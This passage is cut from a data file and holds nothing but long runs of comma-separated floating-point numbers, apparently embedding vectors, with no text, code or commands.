,0.00894985,0.0022491184,0.033852164,0.015011081,-0.010569734,-0.018676845,0.01578674,0.011338074,-0.0092665525,0.01270818,0.0308604,0.005520347,-0.014666352,0.014796659,0.008419727,0.0115241455,-0.020717077,0.010681215,-0.0027165783,-0.006319524,0.03125312,0.017852768,0.022163747,-0.038866527,-0.010498056,0.013509355,0.0000456238,-0.014349222,-0.0070580505,0.010340173,-0.010488482,0.004694084,-0.0057531088,0.0023632175,-0.00024430492,0.040963784,0.012400918,0.02887604,0.0245247,0.02844585,0.002102141,-0.006012818,0.0075658485,0.021961212,0.026096903,0.0031906788,-0.008867134,-0.0013317043,-0.0017560297,0.016957037,0.0029317061,0.00431345,-0.0052328077,-0.002762543,0.010850854,-0.025473733,0.0005868859,-0.0011413292,-0.0033667632,0.01197119,0.0018246496,-0.010288603,-0.020555621,-0.0051094103,-0.0019568878,0.01640413,-0.00374144,-0.009770114,0.020562207,-0.020511886,-0.011428445,0.006738588,-0.01954662,0.0056037134,0.0049984073,0.003604354,-0.015182162,-0.0037818267,0.01570338,-0.009504692,0.005294956,0.0077887764,-0.0008718106,0.00019103043,0.0035511702,0.022733351,-0.011531306,-0.0006544756,0.0003128923,0.0026277942,0.017679535,0.0185606,0.0050609605,-0.0064396425,0.012983638,0.0010787456,-0.018260766,-0.010524295,-0.012161707,0.011952494,-0.009301238,-0.006814541,0.033840444,-0.004364286,-0.004417672,-0.010748845,0.011202848,-0.0009096624,-0.00002636693,0.013691393,-0.013594384,0.008521594,0.0030696653,-0.025089603,-0.0145191625,-0.019384518,-0.006241781,0.029874628,-0.007820944,-0.003733163,0.0179303,0.005436223,0.029082518,-0.004677974,-0.0007932636,0.01944302,0.008757196,-0.0030377111,0.0030429591,0.017004842,0.0060790773,0.00962421,0.031146236,-0.028604014,0.018556846,-0.0043190722,0.009843842,0.0066785947,-0.01765885,0.008456466,0.012524986,-0.0067823324,0.004745245,0.014695256,0.031659286,-0.014310046,-0.0037039914,-0.004594998,-0.0061818776,-0.02189911,0.030616082,-0.028762624,0.011771522,0.0002830249,0.00028707113,-0.016177788,0.0024518822,-0.029000573,-0.01421825,0.0068233865,-0.02016372,-0.0100225145,0.018598942,-0.025778277,0.01610085,-0.013023001,0.018728985,-0.014099752,-0.015985297,-0.010546732,-0.09684613,0.0013742584,-0.0016258479,0.013181543,0.03607949,0.012309044,-0.009527868,-0.013278574,-0.010683614,0.010878058,0.004662914,-0.0067450916,-0.010016609,0.015096951,0.032102402,0.00003908628,-0.007829219,-0.015414784,-0.0013866774,-0.017325692,-0.004073712,-0.0027023256,-0.004838244,0.0039816806,-0.0016545117,-0.0067739347,-0.007293304,-0.0066154795,0.00008138011,-0.002792856,-0.01039289,0.0047138906,-0.0032536776,-0.014370273,-0.0123101985,0.009594332,0.013162883,0.014467348,-0.029398872,-0.04048896,0.00535066,0.003793635,0.0046154717,0.025623456,-0.03264882,0.021511286,-0.023477204,0.0018409226,-0.0038478635,0.00085208024,-0.0041601043,0.0056870487,0.01090879,0.0021172487,0.006827809,0.015019312,0.003938641,-0.015067902,0.019037534,0.0022526567,0.013482477,-0.01166661,0.0145886615,-0.012410845,-0.013627702,-0.0024839232,0.0018481725,0.02735107,-0.0036008817,0.006197977,-0.008989093,-0.028067835,-0.0101140365,-0.0049927575,-0.0039577326,0.022616332,0.013741627,-0.009887053,-0.02056599,0.003116014,0.013480998,0.013957969,0.016191803,0.024528725,0.0027947824,0.010020236,0.009477622,0.010602925,0.01679554,0.014043596,-0.0064582126,0.0016715626,0.028404543,-0.014069498,0.021874879,0.003669643,0.0005379994,0.015194445,-0.016600572,0.0046467423,0.001453867,0.0130426,-0.0016673842,-0.0070543815,-0.012101648,0.021646447,0.014695346,-0.016597822,-0.005481497,-0.01424774,-0.0042445203,0.01775396,0.02273874,0.03813184,0.003117147,0.0064672315,0.0074463394,0.029120939,-0.0005339989,-0.006842129,-0.005632343,-0.0067218663,-0.014994361,0.036463182,0.011013229,0.0021570735,0.008196628,-0.009885631,-0.025084225,0.016781632,-0.019057656,0.031264585,0.014939185,0.010199244,-0.006594133,-0.010800428,-0.0060144654,0.022998331,0.013798531,0.0014757629,0.001384835,-0.026240775,-0.007154129,-0.008992683,-0.03522368,0.021895379,-0.023794316,0.0021387734,0.008535898,0.00253623,-0.0017667937,0.0005686698,-0.009484857,0.005199013,-0.007628263,-0.0134464,0.009950571,-0.010626634,-0.010404891,-0.0075472803,0.002288865,-0.0059480127,-0.011075837,-0.005605928,-0.02078099,0.010689614,0.01099882,-0.00026017282,-0.011556372,-0.008011123,-0.014840143,-0.018654253,0.0033728548,-0.0026083903,-0.018058635,0.001912125,0.034504764,0.015149986,-0.0072092665,-0.004272063,-0.041786492,-0.008374648,0.0013371445,-0.035617035,0.004001056,-0.008565814,0.0012177083,-0.0060841576,0.024736017,-0.0054394673,-0.013811788,-0.0075845555,0.01039589,-0.0191707,-0.0027411121,-0.023603644,-0.0046546343,-0.018819544,-0.022644348,0.01810469,-0.0041501652,0.015705017,-0.0080254385,0.01576629,0.024815423,0.0251033,0.00075133337,0.01797405,-0.018626213,-0.012586911,-0.016924622,0.009253112,0.0053256154,0.12586293,0.016437048,-0.015286705,0.022122268,0.0056401333,0.005662119,0.017788695,-0.0067277094,0.0069671385,-0.000051897372,0.014810894,-0.016701607,0.025796559,-0.0114003,-0.008825616,0.024178226,0.013504254,-0.026108867,0.017881386,0.011108522,0.011202065,-0.018221581,-0.013564104,-0.044822697,-0.009786591,-0.076709,0.041886263,0.0077970983,0.0060280757,0.017442944,-0.0019952313,-0.006491994,0.014335251,0.022036023,-0.015543439,0.0042740735,0.007804153,-0.015338782,-0.0028964465,0.0036734806,0.005554946,0.0026340699,0.0057317084,-0.016919563,-0.015555,-0.01682811,0.0076438985,-0.0075778295,0.009282622,-0.024112677,-0.0064957174,-0.0025417595,0.007836912,0.00095409993,0.0035413902,-0.01616272,-0.002532033,-0.0033176562,0.0016179795,-0.018397432,-0.002268327,0.003150622,0.0031103971,-0.0062651657,0.013932355,0.00030405167,0.00897871,-0.015240069,-0.013111217,-0.009339809,0.023024574,-0.012238195,0.0017126808,-0.008289886,0.008618044,0.02064547,-0.012817325,-0.019929297,0.0031640716,0.011533114,0.0016941781,-0.003782229,0.0016076813,0.008470706,-0.0025181982,-0.0060291523,-0.020988759,0.023722349,-0.017556014,-0.016021468,-0.013431149,0.013770002,0.02160088,0.014587312,0.004043344,0.0009007153,0.0051963553,0.0020828398,-0.016775902,0.01237578,-0.0094020935,-0.015704405,0.0014592039,0.008949011,0.0071059195,0.0029958817,0.01579329,0.020552961,0.01571679,-0.0033215035,-0.0028314563,0.023338968,0.022370748,0.009014742,0.020244127,0.03945249,-0.023322903,0.0030723044,0.010801735,-0.018483564,-0.012134129,0.002065646,0.013790675,0.025003387,-0.00428034,0.01930769,-0.025976112,0.009764067,-0.003902719,0.003927268,0.010914947,-0.034482334,-0.010926563,0.040100686,-0.0028911503,0.002796819,0.036827687,-0.008463881,0.007121351,-0.0013555766,0.0027647768,-0.020863459,-0.009369919,-0.016087284,0.00041890147,-0.016432855,0.02246034,-0.0011550569,0.017375542,0.0023957628,0.026111316,0.0080859065,-0.010393751,-0.0077787316,0.011076294,-0.012029278,-0.010483741,0.007419567,0.0029995546,-0.0043373075,0.006552295,0.0062231887,0.0017687421,-0.04103712,0.023389287,0.014982867,-0.008137954,0.007861354,-0.005287829,0.0014417722,-0.011338464,-0.005149859,0.0018063667,0.0036797102,-0.017174857,0.0027515378,0.009131938,0.004153847,-0.006829061,0.0028235898,0.027426373,-0.0006794755,0.0028293242,0.0000321678,0.018221699,-0.002540007,0.019345094,-0.005207785,-0.016436717,0.015674628,-0.01978491,-0.015372321,0.0035536676,0.0058180173,-0.0037256132,-0.0018050125,-0.008605034,0.032216538,-0.030145977,-0.03744468,-0.0077428273,0.011160683,0.02685371,-0.006493713,0.0026552796,-0.010315082,0.0032447968,-0.00883127,-0.01035541,-0.0072550937,0.016785178,-0.009562109,-0.012104061,-0.029063473,-0.012942398,0.0057743858,-0.018943392,-0.029804563,-0.015030709,0.013921719,0.00702985,-0.0057498515,0.004146341,0.013268795,0.007200228,0.011335963,-0.0049754577,0.017702501,0.014701599,-0.036705416,-0.020517025,0.0078746155,-0.00062973605,-0.00445929,-0.028611518,0.005925686,0.012881501,0.025296593,0.002863367,0.029986724,-0.0066951774,0.00478809,0.031459715,-0.006733801,0.004952655,0.014078174,-0.009504335,0.005051228,0.02275477,0.0002925742,-0.020410022,-0.0077525373,0.011625225,-0.010857483,-0.030201217,-0.006286346,-0.010357169,0.014846729,0.010424967,-0.005517304,0.013558236,0.0133556435,0.0036694237,0.03101128,-0.005711201,-0.02588943,0.0073521477,-0.02897855,-0.0037229324,0.02300437,-0.0030148362,0.030002069,-0.009248632,0.025344925,0.013963176,0.017708294,-0.008222028,-0.0005788741,-0.007863669,-0.00022115879,0.025437027,-0.023123318,0.0042265775,-0.020160913,0.0007274481,-0.014018835,-0.009027934,0.027789963,0.040726062,-0.050009526,-0.0035956993,0.020469844,-0.010015463,-0.031113094,0.0058417087,0.0038084225,-0.01847019,-0.009937847,0.008823771,0.009126381,-0.01365497,-0.032525383,-0.02007115,0.027544538,0.00088843564,-0.012879598,0.0072995354,-0.007872893,-0.005582337,0.005946433,-0.0026646794,0.00030271968,-0.01600044,0.0013926501,-0.0032025238,-0.0042372644,0.016535683,0.006460486,-0.0049105287,0.014934633,0.020490428,-0.013933418,-0.00041014774,0.029317131,0.0054717567,0.009843232,0.010307031,-0.033609185,-0.031694997,-0.0038604012,0.003327163,0.006918696,-0.006167158,-0.0037547932,0.0052093226,0.009417694,-0.003522389,0.14583203,-0.006583984,-0.0014709187,0.016282255,0.0012984365,-0.002433155,0.029229322,0.027125146,0.011343579,0.022726415,0.016861318,0.00058533956,0.02157783,0.032146636,-0.010556734,-0.013839502,0.0041072387,0.14823027,-0.01817079,0.016280027,0.003286804,0.003435653,-0.010930161,0.0037041323,0.013877099,-0.07788475,-0.009535048,-0.024886053,-0.015129909,0.0077655977,-0.046779666,0.019550748,0.004163393,-0.006208177,-0.017651005,-0.0015355446,0.015069013,-0.0069718347,-0.008339202,-0.006974995,0.017911203,-0.007763636,-0.015746819,-0.004712569,-0.0102310395,0.005959692,-0.030751595,0.001153618,-0.00020372617,0.0073362114,0.014193599,-0.0020646101,0.013041196,0.020295253,0.012750262,0.014057118,0.008220216,0.008152166,-0.028535191,-0.010322049,-0.013335007,0.007162772,-0.0023254806,0.023192251,0.00047603872,-0.0025460406,-0.015140151,0.0031850368,0.019956702,0.016185777,0.016062768,0.011872221,-0.03773913,-0.022321282,0.03813059,0.015521911,-0.006522075,0.020202829,0.0023798589,-0.015991706,0.026751306,0.0070404927,-0.010403317,0.0031618085,0.016018383,0.0018741682,0.0029233894,-0.005207992,0.020233316,-0.016358478,0.0024282713,-0.0064184773,-0.01906807,-0.0046157637,0.0009138009,0.029600024,0.012138594,-0.01290221,0.0036723868,-0.028123796,-0.010684697,0.015477173,0.004620389,-0.017096438,-0.011109,0.0063084248,-0.008166407,-0.026370646,-0.013371864,0.004111676,0.008119142,0.019089306,-0.015325328,0.011872302,-0.01149014,0.0016573775,-0.022016376,-0.014677932,-0.028088603,0.012929668,-0.00062443275,-0.0020637764,0.0023043645,0.013355488,-0.016400743,-0.00048216913,0.031555004,0.008263015,-0.013987519,-0.0038797848,-0.03056076,-0.00802606,0.021203473,0.043965537,0.010627706,-0.0052966517,0.015930016,-0.043168828,-0.017240576,-0.0030522747,-0.012945512,-0.002771823,0.0028969003,-0.0019953758,0.005865522,0.0075185443,-0.0037481268,-0.002928219],[-0.014328539,0.0017164808,-0.008104617,0.001577559,-0.0032109858,-0.01430773,0.003282475,-0.011487426,-0.010959793,-0.016506033,-0.0058280034,0.008340217,-0.0065582627,0.0055851727,-0.0064309067,-0.007143319,0.035363063,-0.0014963278,-0.0073082442,-0.0059036645,-0.0011809524,0.0029296842,0.0134123955,0.007992601,0.013331432,0.010756337,-0.008947223,-0.0133056175,-0.0010246694,0.002948091,-0.0055149426,0.017054485,0.02949954,-0.0005094055,-0.00081083935,-0.010120054,-0.027249854,-0.008611587,0.0030201233,-0.018048214,-0.008422135,0.017831923,-0.0074463445,0.0070157195,0.0073666396,0.008824485,0.011684675,0.007566151,-0.017310845,0.008605982,-0.0016223697,0.0030906764,-0.012918792,0.02297019,-0.011630046,0.007061,-0.008028779,-0.039940324,0.0032221815,-0.0083110975,-0.0059058997,-0.0060722707,0.0039302106,-0.00725393,0.009275777,-0.019494489,-0.006900753,-0.0006959905,-0.0005626067,-0.027428793,0.0054000188,0.0018487084,0.029107438,-0.0036185947,0.018528659,-0.0044361725,-0.0018158226,-0.014600889,-0.013558031,0.019776309,-0.0073041264,-0.005209205,-0.017457245,0.009988485,0.022286143,-0.01756306,-0.025970006,0.0062035318,0.005072886,-0.029099727,-0.0036130808,0.013129714,0.0098808175,-0.0023018834,-0.018665703,0.010607941,0.008355862,-0.002758957,-0.010856072,0.012176191,-0.004059553,0.0012103148,-0.048869297,0.024231372,0.0148207825,-0.024158254,-0.0075051947,-0.0035935065,-0.017738044,-0.00853574,0.004915249,0.006207806,0.011520886,0.015864125,0.007823433,-0.012603717,-0.004464795,0.0024842005,0.01105029,-0.00096081465,-0.0028517155,0.01761953,0.030384911,-0.023079097,0.0012630002,0.00048388584,-0.009528481,0.014711701,0.0068848985,-0.021765724,0.009196367,0.026925733,-0.0017905642,-0.01086749,-0.0105628595,-0.00064491475,0.008194296,-0.015914751,0.006046494,-0.004008418,0.012140491,-0.0046248785,0.000047943988,-0.0020736628,0.026140798,0.030175699,0.0018052525,0.042022742,0.019455172,-0.032200247,-0.0005972955,-0.00029223788,-0.0031337496,-0.01549531,-0.015761653,0.008969796,-0.0017043614,-0.00885014,-0.034736052,0.0029594959,-0.016970605,0.012330347,0.01036866,-0.01565306,-0.020043388,-0.023334589,-0.0026052857,-0.0054351552,-0.011469048,0.007256641,0.006604331,0.015645286,0.014671185,-0.002817038,0.011787549,0.013314466,0.014714278,-0.016605714,0.0017983103,0.021420358,-0.0017735898,0.0015461985,-0.013797662,0.005432481,-0.0031469958,0.02177453,0.016354527,-0.011363776,-0.0074208127,0.0037111305,0.010262337,-0.019670408,-0.006565807,0.0022278773,-0.0014876274,-0.01821651,0.010971149,0.12227465,0.0014255279,0.0048346347,-0.014151336,0.011235518,0.010887486,-0.020345187,-0.016924677,0.003609471,-0.01694893,-0.00031139108,0.0076476964,-0.009822678,0.011156473,-0.008427314,-0.0014520952,0.00801294,0.016385501,-0.036853384,0.0207355,0.018610146,0.0051871566,0.013586755,-0.0073259403,0.006131995,0.016121555,-0.013591737,-0.0025789298,-0.034963198,0.026058376,-0.0052888547,0.0019418807,-0.02111414,0.028904138,0.0071606096,-0.00044381828,-0.03539994,0.009686776,-0.017027028,-0.007116324,-0.027679041,-0.017533705,-0.0013364437,-0.028196044,0.010585121,0.02391742,0.049388293,-0.0030751245,0.023033135,0.018652746,0.02016711,-0.020669276,0.0039957333,0.00056373933,-0.0034748972,0.01806781,0.015928343,0.003237243,-0.013007226,-0.020366058,0.002211063,0.004401155,0.0042794026,0.029649839,0.0042066313,0.0042470037,0.014237938,0.023338972,0.0026089621,0.011615431,-0.013806442,-0.009762936,0.00040215472,0.0031729746,-0.013234977,0.00058751943,-0.010286369,0.025511257,-0.0030755415,0.010228662,0.0025311264,0.004668736,0.0056448383,0.0018289882,0.013467837,0.020044958,-0.0156394,0.007902144,0.0020979408,-0.014691816,0.009279666,0.012435708,-0.00019280011,0.022687595,0.0005485944,0.029736495,0.025772283,-0.009312904,-0.012221924,-0.023562891,0.006305221,0.0025516648,-0.017320577,0.0005668752,-0.0063329088,0.026255794,0.0034566303,-0.0014064902,0.0025295208,-0.0014408333,0.012542114,-0.0072772116,0.026890479,-0.04394907,-0.0044872193,-0.010019788,-0.021429887,0.0068903295,0.020184962,0.003892193,-0.008091612,-0.0011369908,0.01204221,0.0018960414,-0.015195784,-0.009664072,-0.024537044,-0.014488373,0.008318152,-0.0015049165,-0.02104049,0.003283827,0.03335105,-0.008262505,0.016306285,0.019101648,0.008706163,-0.033145484,0.024188876,-0.0031035023,0.026815578,0.014454979,0.029620001,-0.008878494,-0.014173747,0.007539664,0.013296442,0.0016763599,-0.007079283,-0.010169865,0.0022513114,0.0067023127,-0.008381978,0.030115416,-0.016911568,-0.010229937,-0.012306317,-0.044252977,-0.010625194,-0.010556077,0.007787974,-0.0019328068,-0.011372808,0.015939023,-0.0008249839,-0.0069699613,0.0019437559,0.09878968,-0.0013020437,0.003574769,0.009364161,-0.004329371,0.007392554,0.032497685,0.026383301,0.0047314963,-0.00022123633,-0.034711946,0.0036036528,0.003429823,0.008558831,-0.011468833,0.017427389,-0.025429284,-0.024882952,-0.0058379886,-0.017652234,0.0427021,0.002738189,0.0033790157,0.019328509,0.014397957,0.021717163,0.0058556106,-0.0082163215,0.011940185,-0.010896707,-0.00928912,-0.002896059,-0.0016969908,-0.0020374628,-0.022561228,0.026812796,0.015278993,0.010447006,-0.013856963,-0.005265205,0.013186671,0.0020864333,0.000055889985,-0.018930513,-0.012070824,0.03975681,-0.0014570706,-0.007041526,-0.02057453,0.01228393,0.0051345085,0.012097844,-0.024934579,0.025908466,-0.011335493,0.021869782,0.010153608,-0.034728386,0.049050074,0.018820656,0.012735742,0.024753645,0.0044090822,-0.0051828106,-0.0062442045,0.008162605,-0.00655389,-0.0015141041,-0.020873811,-0.035170812,0.016044525,0.026133789,0.00036251385,0.016119568,-0.0052148593,0.01443139,0.010275338,-0.012661067,-0.0023262429,0.020028034,-0.0054450557,0.012402297,0.028438779,-0.013463657,0.0008974868,0.00007093333,0.009478491,-0.01230881,0.0024941885,-0.0044321218,-0.027964674,0.03084281,0.0055064554,0.003913367,0.01409888,0.015675828,0.021785323,0.028751394,0.008513401,0.011241064,0.013612687,-0.008483121,-0.0135562355,0.008865894,-0.014549636,-0.0025776003,0.005566678,0.018986996,0.007657176,0.035744324,0.0048609255,-0.009596574,-0.004526829,-0.020006733,0.00031764654,-0.0266417,0.010910816,0.00023848715,-0.00003315742,-0.005929346,0.010703707,0.016539507,0.0042000287,0.008930338,-0.0006100979,0.023848444,0.0067477715,-0.017064463,-0.0027156,0.02689017,-0.0017383338,0.030521458,0.022518102,-0.026619853,0.0151734,-0.0024946053,-0.015566998,-0.037009645,0.041432325,0.013772843,-0.0020634648,0.009249478,0.04534519,-0.009820783,0.01233866,0.011948987,0.02108741,-0.0019564123,-0.027295867,0.003407375,0.012368302,-0.015418163,0.010614951,-0.013280493,-0.0012044341,-0.003060211,0.017798169,-0.023082238,0.01462548,-0.003087612,0.013439298,-0.012806649,-0.00416098,0.01830932,0.0046963096,0.0030768856,-0.0100232,0.051319286,-0.02312975,-0.0295519,-0.0145233795,0.022043796,0.0033537946,0.015127749,0.0062674284,-0.014541254,0.003463044,0.01361401,0.022454418,0.0142826745,0.017746663,-0.01624111,0.0043670572,0.0072863065,0.005775369,-0.029610652,0.0030226354,0.02010504,0.0033086105,-0.019044736,-0.018871294,-0.025654374,0.0070287143,0.0252198,0.0051614563,0.00061343855,0.004995297,-0.021904806,-0.0031791134,0.019105254,-0.0042992895,-0.0055602854,-0.006375941,0.013707823,0.0039000374,-0.009801569,0.020027792,-0.0036084221,0.004463874,0.012447452,0.0049639824,0.01645275,-0.005297563,0.0107207885,-0.0047267666,0.01557169,0.00070506363,-0.016049847,0.014100038,0.0093194395,0.0324812,0.0043888185,0.005440062,0.009460198,0.009436881,-0.020346222,0.018392097,-0.0039526545,-0.0071593765,0.00051689585,-0.01078119,-0.0044376273,0.00047089474,0.0050073853,-0.010065261,-0.0007278279,-0.028103875,-0.0005751279,0.008478701,-0.022933444,-0.017339239,0.021631887,0.013848282,-0.021151386,0.019130362,0.010658559,-0.02709824,0.0045418423,0.01715865,-0.013255648,-0.008416962,0.030108275,0.0035288595,0.0056417584,-0.0036534555,0.0055063684,0.009991476,0.021608518,-0.015242826,-0.0013638728,0.00012389447,0.019350156,0.010059173,0.00031646725,-0.050363746,0.003859164,0.00371306,-0.01881737,-0.0029457875,-0.0015278771,0.046886615,-0.010797788,-0.0049793804,0.016780928,0.0029930153,-0.0019986692,-0.0081568705,0.013567705,-0.05147462,-0.009042484,0.02218416,0.01261463,-0.010155585,0.02993046,0.031598303,-0.006151336,0.01117186,0.018332532,-0.012360889,-0.0103567,-0.015651796,0.020730823,0.012631229,0.0006501899,-0.039562155,-0.006539579,-0.01652176,-0.04581002,-0.027741194,0.028632695,0.019232666,0.009215226,-0.004443703,0.011952284,-0.0046393587,0.013124836,0.0009831252,-0.03978614,-0.008909664,0.018299269,-0.002094173,0.012174958,0.038623136,0.0005133747,-0.0015490198,-0.023761453,-0.027830157,0.0025843275,0.021359108,-0.017428085,-0.0122307325,0.0029692282,-0.022816926,0.0019205203,-0.0429526,0.02153898,0.012393289,0.028145064,0.03481566,0.021572389,-0.0026663316,0.020674955,0.002406388,0.017976796,0.0053824713,0.021331083,0.007026275,-0.0055767824,0.0024729196,-0.005203588,0.0036264628,-0.020034088,-0.013919705,0.02531117,0.0580991,0.019192612,0.026745997,-0.0061262017,0.0027081356,-0.002778187,0.002252814,-0.012716154,0.021299548,0.008009922,0.0097554475,0.013573742,-0.010431189,-0.0037751205,-0.014434029,-0.034010213,-0.0042906436,0.024524562,0.003956504,0.0030221678,0.0049875607,0.003456611,-0.012357654,-0.0044145402,-0.014649435,0.0021865685,-0.024040477,-0.020628814,-0.0055412324,0.0016189262,0.0058016153,-0.02815535,0.0074398876,0.004610495,0.008084797,-0.013404311,0.0009783125,-0.0021416938,-0.0017897846,-0.025260413,-0.025256682,-0.013183105,0.0141976895,0.0159232,-0.008918001,-0.013807523,0.011935487,0.022386556,0.0014902062,0.019691974,-0.024514914,-0.023295563,-0.0023723035,-0.0036759356,0.030438822,0.02085664,0.018009335,-0.008245612,-0.008111785,-0.0003744544,-0.024726393,-0.018290186,-0.003649535,0.0007243421,-0.0014533487,-0.01614298,0.0043648733,-0.01574949,-0.020090383,-0.030600812,0.021934198,-0.032518405,-0.029908357,0.014919216,0.02300984,0.0019258634,0.017157415,-0.025938792,0.014251584,0.02450468,-0.01040706,0.009742384,-0.009622839,-0.0022824476,0.026971325,0.0135708805,-0.02087387,-0.035268534,-0.021485599,0.0020345347,0.0011764861,0.0010370362,-0.009211856,-0.017779939,-0.022094766,-0.016998824,-0.002584136,-0.023748334,0.005623213,-0.005601311,-0.050169796,0.009211245,-0.022416726,0.00063078705,0.020040862,-0.003955833,0.018098101,-0.02205821,-0.0022717991,-0.023451801,-0.026872382,0.021786451,-0.014038309,0.022671262,0.021369986,-0.040808003,-0.019850029,-0.025967648,0.0024278318,-0.023350336,0.023311852,-0.0015505013,-0.010801996,-0.033987097,0.010076053,-0.030123461,-0.0016049049,-0.021698104,-0.015588228,-0.00012962965,0.0036767067,0.009935023,0.007020815,-0.03395924,0.003533983,-0.003675161,-0.026708933,0.018753389,-0.002016272,0.00013457907,0.007103154,-0.000972302,-0.019023748,-0.0014155352,0.0067134053,-0.01637256,0.02721084,0.020660548,-0.004539577,0.020916691,-0.0034791946,-0.0076573207,-0.0145756155,0.0047012726,0.009536133,0.0051577254,-0.0059426543,0.002772814,0.007591189,0.0026476907,-0.024868498,0.046175633,-0.005559183,0.0029770576,0.01482207,0.006115615,-0.022864765,-0.017312204,0.009158704,0.007214835,-0.010696226,0.013331604,-0.01523191,0.032986358,0.041767515,-0.0105395,-0.004568743,0.019751271,0.0033285767,-0.017651029,0.0098682,0.004745096,-0.013326191,-0.0051765908,0.027641257,-0.032899667,0.0012833368,-0.0106218215,-0.0021670314,0.0045131333,-0.026174357,0.004534844,-0.015237777,0.012623634,0.03518417,0.017167574,-0.015102242,-0.008496395,0.007592954,0.0064272312,-0.0015990374,0.007779036,0.005603541,0.002067107,0.008659556,-0.017906977,-0.013578879,0.002204019,-0.0070873443,-0.0010359801,0.019142576,0.0064343363,-0.0034868193,0.0016372013,-0.008369664,0.035574876,0.02279094,-0.0061646514,-0.0056524477,-0.016676927,-0.0061276043,-0.0059069004,-0.0036248898,0.00275343,-0.01856041,0.03687293,0.021498987,-0.016156776,0.008064072,-0.0015701703,-0.010423962,0.01670002,-0.03833964,-0.011121362,-0.00594787,-0.0029683108,0.0047669183,0.01612504,0.0198248,-0.00048878475,-0.0031839283,0.007250421,0.026260434,0.016034974,0.021897774,-0.007299736,-0.014568348,0.0026890705,0.028278245,-0.01280604,0.0016042441,0.0005960004,0.0066871573,-0.019562239,0.016756555,-0.0014644249,-0.0033657528,-0.019703139,-0.008300233,0.0087946225,0.014643815,0.015882762,0.008585385,-0.018064097,-0.011747666,-0.0046527702,0.021271722,0.019376341,-0.0028262062,0.0037752409,-0.0046011354,-0.011178657,0.00073956116,0.016957788,0.0011287925,-0.014653917,0.024646714,0.00013666588,-0.0047078733,0.009982951,0.028595813,-0.004592262,-0.008848216,0.020416621,0.003503153,0.018206466,-0.0056578177,-0.0021885682,0.024302866,-0.009767802,-0.005097424,-0.004937441,0.034123965,0.012418228,-0.015119381,-0.009812673,0.017414968,0.03235416,-0.016439771,0.0034293341,-0.0026412026,0.014010288,-0.0034879623,-0.0010384772,-0.0368241,0.007175115,0.008257984,-0.0154524995,0.00090186606,-0.0048618866,-0.0046136305,0.011623057,-0.017160658,0.0042015617,-0.022876041,-0.011613776,0.0052612787,0.008496495,-0.0040456736,-0.011091321,0.003803843,-0.00318846,0.0034398097,0.009060273,0.0024508622,0.009654884,-0.0034390364,-0.006850801,0.00031240092,0.0034299388,0.04689925,-0.0039733346,-0.010172208,0.05150889,0.014321416,0.0011756063,0.015268893,0.019958638,0.046683494,0.027302084,-0.00909391,-0.00064097374,-0.011877179,0.013724831,0.013305267,-0.0033991071,-0.008129811,0.013230742,0.03782821,0.025397342,-0.0030850642,0.016968869,0.035850894,0.00048783692,0.020317968,-0.00090160384,0.021721037,-0.0039055836,0.00090573856,0.0018886329,0.0071425214,-0.002105048,0.003616574,-0.0046857353,0.035171486,-0.0065456545,-0.008462038,-0.014943397,-0.008376194,0.002985983,0.0057304865,-0.011864327,-0.01041804,0.020827277,0.00011457686,-0.023330392,-0.004563384,0.006305628,-0.011706626,0.02270484,-0.0038201676,0.008774874,0.008697746,0.010802926,0.010381524,-0.0005105571,0.0008357097,-0.0015784474,0.005144814,0.024121098,-0.012552156,-0.0326419,-0.00834522,0.0107880365,-0.03401231,-0.0051780446,-0.015369363,0.00009967225,0.0043504518,-0.0056177676,-0.0034312767,-0.014823885,-0.012827962,0.045107864,-0.007041796,-0.034585945,0.032283112,0.021934794,-0.0054050554,0.009330992,0.020527616,0.02294917,0.019826336,-0.005844475,0.013544072,-0.0040620454,-0.01549666,-0.025508538,-0.0012510046,-0.0032883629,-0.02002039,0.008005794,0.0074799005,-0.018297832,-0.010956682,0.024458667,-0.02953462,0.02191437,0.0015042524,0.0008522865,0.012918659,-0.018514154,0.00926871,0.024313956,-0.024252897,0.03531323,0.007413825,-0.038581025,-0.012710649,0.00020272541,0.0028307228,-0.018005446,0.0021801277,0.016020244,-0.0150021445,-0.021393871,-0.027437888,-0.000409302,0.022428758,-0.016282486,0.008440387,0.058663316,0.015632596,0.005084375,0.0019959204,-0.024649821,0.032064874,0.025141269,0.008939473,-0.004402846,0.017021025,-0.005177157,0.009078863,0.00977473,-0.024658833,0.0025345087,0.0007597748,0.003061489,-0.040978488,-0.0133921895,0.0023835711,0.015693713,0.011582728,-0.024814138,-0.009953948,0.033439953,-0.001780286,0.010500643,-0.007819586,0.011261738,0.008431659,0.023029732,0.021593932,0.015545204,-0.004113897,0.011918207,-0.0133275045,0.010701126,-0.014373116,-0.00050433824,0.0045934175,-0.00031449302,-0.018640958,0.004784482,-0.0015604015,0.012521939,0.00802664,0.0037076392,0.026726462,0.013393675,-0.0043177996,0.005096603,-0.0019157255,0.01633402,-0.0064527625,-0.0139557235,-0.00623633,-0.0014443022,0.0014923104,0.0037243508,0.0065505602,-0.0081699295,-0.003880356,-0.038310055,0.009210463,0.01850813,0.0054552583,-0.00814714,0.0029264148,0.002400694,-0.016590182,-0.028116131,0.006256195,-0.010805091,-0.006839199,0.0027144314,-0.020878032,0.0035420042,0.016563596,-0.005841314,0.096001044,-0.0050577326,0.01434322,0.003655402,0.0072766463,-0.019684024,0.003848295,0.009855231,-0.0035035345,0.0003997718,-0.022333926,-0.006916614,-0.021291638,-0.01901737,0.007244581,-0.014747124,-0.0077579212,0.018304706,0.0069863545,0.01282384,0.01249101,0.00779449,0.0032526632,0.010952903,-0.021847222,0.006527869,0.017795824,-0.0208232,0.018497169,0.013360152,0.01573512,0.0012369634,-0.010793806,0.011251172,0.007925933,0.016005455,0.007693261,0.013530274,-0.027657917,0.0006556768,0.01942599,-0.016527621,0.02893713,0.004564084,0.03646315,-0.0041556675,-0.003946042,-0.018213429,-0.007562167,-0.006695001,0.010772719,-0.021968173,-0.008564147,-0.002486398,-0.00096174364,0.008177339,0.004755457,0.023062123,0.0009288262,-0.007000489,0.0051066116,0.01691343,-0.015077227,0.0042992127,-0.008390735,0.005318912,0.008666724,-0.010712963,0.016199747,-0.026261434,0.03182054,0.012101846,0.021238215,0.020931229,-0.0028152422,-0.007600924,0.019121444,-0.009211861,-0.0047954153,-0.021813935,-0.0075320965,-0.004551654,0.042529993,0.015243418,-0.02113915,-0.004601463,-0.0066064023,-0.008354812,0.08489824,0.020061195,0.0000692247,0.013887481,0.00027647841,0.009698878,0.0015369231,0.029626308,0.010003489,0.0060005104,-0.019513333,0.0107912775,0.005387329,-0.00030858765,-0.0058593433,-0.022047453,0.0028536182,0.0024815379,-0.00854482,-0.017403143,0.0